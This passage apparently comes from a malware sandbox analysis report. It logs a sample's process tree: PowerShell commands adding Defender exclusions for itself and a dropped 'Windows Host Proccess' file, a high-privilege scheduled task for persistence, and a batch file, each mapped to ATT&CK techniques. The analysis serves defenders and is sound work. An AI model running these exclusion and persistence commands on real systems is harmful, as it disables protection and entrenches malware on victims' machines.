Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
Tree depth: 7
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4120

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
Tree depth: 7
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1300

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Host Proccess'
Tree depth: 7
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5804

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
Tree depth: 7
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5184

Image: C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Roaming\Windows Host Proccess"
Tree depth: 7
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5152

Image: C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows Host Proccess"
Tree depth: 7
- System Location Discovery: System Language Discovery
PID:5332

Image: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6837.tmp.bat""
Tree depth: 7
- System Location Discovery: System Language Discovery
PID:2292

Image: C:\Windows\SysWOW64\timeout.exe
Command line: timeout 3
Tree depth: 8
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5464

Image: C:\Windows\system32\wbem\WmiApSrv.exe
Command line: C:\Windows\system32\wbem\WmiApSrv.exe
Tree depth: 1
PID:5276

Image: C:\Windows\system32\AUDIODG.EXE
Command line: C:\Windows\system32\AUDIODG.EXE 0x2c8 0x470
Tree depth: 1
PID:6008

Image: C:\Users\Admin\AppData\Roaming\Windows Host Proccess
Command line: "C:\Users\Admin\AppData\Roaming\Windows Host Proccess"
Tree depth: 1
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3200
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)

Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)

Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads